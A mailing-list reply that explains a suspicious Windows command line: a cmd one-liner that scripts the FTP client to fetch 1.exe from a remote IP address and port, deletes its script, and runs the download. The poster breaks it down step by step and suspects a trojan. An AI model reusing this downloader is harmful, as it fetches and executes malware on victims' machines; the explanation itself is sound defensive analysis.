Re: spooky windows script

hi,

> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

to clarify what this command line does:

it writes the following text lines in a file called "ik":

open 59.31.153.120 22783
user db database
get 1.exe
bye

this are FTP commands, which are now being executed by the windows FTP
client. the parameters -n -v suppresses user autologin and verboseness
and the parameter -s:ik executes the content of the file "ik" as FTP
commands. the file ftp://db:database@59.31.153.120:22783/1.exe is being
fetched, the file "ik" is then being deleted and finally the file
"1.exe" is being executed. i suppose that 1.exe is some kind of windows
trojan or virus.

cheers,
-stephan loh